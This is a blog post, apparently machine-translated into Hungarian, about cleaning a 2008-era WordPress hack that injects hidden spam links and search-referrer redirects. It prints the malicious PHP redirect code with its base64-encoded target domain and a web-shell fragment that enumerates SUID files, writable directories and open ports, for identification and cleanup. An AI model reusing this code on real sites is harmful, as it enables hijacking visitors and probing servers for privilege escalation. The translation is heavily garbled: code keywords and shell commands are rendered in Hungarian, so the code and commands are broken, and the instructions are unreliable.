Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy lopakodássettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv lopakodástólsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de csak a régi script hogy törölje az összes fájlt a WordPress és biztonsági adatbázis. Ez az eljárás nem működött, és valószínűleg hosszú időbe telt, mire rájöttem, hol van a hiba, ha nem árulta el. Eugen a vita egy kávé, talált link A Google és jó lenne látni.
A MyDigitalLife.info cikket tett közzé: “WordPress Hack: Nyerje vissza és rögzítse a Google és a Search Engine or No Cookie forgalom irányítva a-Needs.info, AnyResults.Net, Golden-Info.net és más illegális oldalak"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni WordPress alapú süti, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (A chmod 777), hogy megkeresse és kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.
Mi az a vírus?
Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor egy másik kerül beillesztésre átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.
Tünetek:
Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.
Azonosítás: (Így lett probléma azok számára, akik nem tudják, hogyan, hogyan kell phpmyadmin, php és linux)
LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!
1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy az „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”formátumot tartalmazza:
$ Seref = array ("Google", "msn", "élő", "AltaVista"
"Ask", "Yahoo", "AOL", "CNN", "időjárás", "Alexa");
$ Ser = 0, foreach ($ Seref as $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']) $ ref)! == False) {$ ser = "1?, Break;}
if ($ ser == ”1? && sizeof ($ _ COOKIE) == 0) {fejléc (” Hely: http: // ”.base64_decode (” YW55cmVzdWx0cy5uZXQ = ”).” / ”); kijárat;
}?>
... Vagy valami. Törölje ezt a kódot!
Kattints a képre ...
A fenti képernyőképen véletlenül kiválasztottam és " ". Ennek a kódnak meg kell maradnia.
2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress". Írja ezt a felhasználói azonosítót (field ID), majd törölje azt.
Kattints a képre ...
* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, álmosVajon ID = 8 .
3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).
4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giffstb. gazdag képkiterjesztések kombinációi a _old és _new.
KIVÁLASZTÁS * FROM wp_options WHERE option_name = 'active_plugins'
Törölje ezt a bővítményt, majd lépjen a blog -> Irányítópult -> Bővítmények oldalra, ahol deaktiválja és aktiválja az összes bővítményt.
Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.
Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.
5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a Google Adsense kód, A hacker.
6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítés a legújabb verzióra a WordPress és állítsa be a blog, hogy ne engedélyezze az új felhasználók. Nincs veszteség ... nem tud nyilatkozni, és logikátlan.
A fentiekben megpróbáltam elmagyarázni egy kicsit, mit kell tennie ilyen helyzetben, hogy megtisztítsam a blogot ettől a vírustól. A probléma sokkal súlyosabb, mint amilyennek látszik, és még közel sem megoldott, mert használják őket biztonsági réseket A webszerver hosting, ami a blog.
Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.
Néhány hasznos utasítás a szerver ellenőrzéséhez, tisztításához és biztonságához. (SSH-n keresztül)
1. cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:
rm-rf foldername
2. Ellenőrizze elimiati (chmod változás) a lehető mappák attribútumok chmod 777
talál minden írható files jelenlegi dir: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárat és files jelenlegi dir: Keresés. -Perm-2-ls
3. Keresi a gyanús fájlokat a kiszolgálón.
megtalálja. -nev “* _new.php *”
megtalálja. -nev “* _old.php *”
megtalálja. -nev “* .jpgg”
megtalálja. -nev “* _giff”
megtalálja. -nev “* _pngg”
4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.
Exploit tartalmazza valahol a forrás ...:
if ($ safe_mode) {
if ($ os_type == 'nix') {
$ os. = végrehajtani ('sysctl -n kern.ostype');
$ os. = végrehajtani ('sysctl -n kern.osrelease');
$ os. = execute ('sysctl -n kernel.ostype');
$ os. = végrehajtani ('sysctl -n kernel.osrelease');
if (üres ($ user)) $ user = execute ('id');
$ Nevek = array (
"=>",
'találd meg files '=>' find / -típus f -perm -04000 -ls ',
'find sgid files '=>' find / -típus f -perm -02000 -ls ',
'mind írhatónak talál files az aktuális dir '=>' keresésben. -type f -perm -2 -ls ',
'az összes írható könyvtár megtalálása az aktuális könyvtárban' => 'find. -d típusú d -perm -2 -ls ',
'megtalálja az összes írható könyvtárat és files az aktuális dir '=>' keresésben. -perm -2 -ls ',
'show open ports' => 'netstat -an | grep -hallgatok ',
);
} Else {
$ os_name. = végrehajtani ('view');
$ user. = execute ('echo% username%');
$ Nevek = array (
"=>",
'show runing services' => 'nettó kezdet',
'show process list' => 'feladatlista'
);
}
Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.
Vissza több ...
Egyes blogok fertőzött: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro / blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, Www.artistul.ro / blog /,
www.mirabilismedia.ro / blog, Blog.einvest.ro
... A lista folytatódik ... sokat.
A Google keresőmotorjával ellenőrizheti, hogy egy blog fertőzött-e. másolás beillesztés:
oldal www.blegoo.com vásárolni
Jó éjszakát, és több munkát ;) Nemsokára jön fel a frissítésekről Eugen on prevezibil.imprevizibil.com.
BRB :)
TO: FIGYELEM! Változó WordPress téma vagy frissítés WordPress 2.5.1, nem megoldás, hogy megszabaduljon a vírus.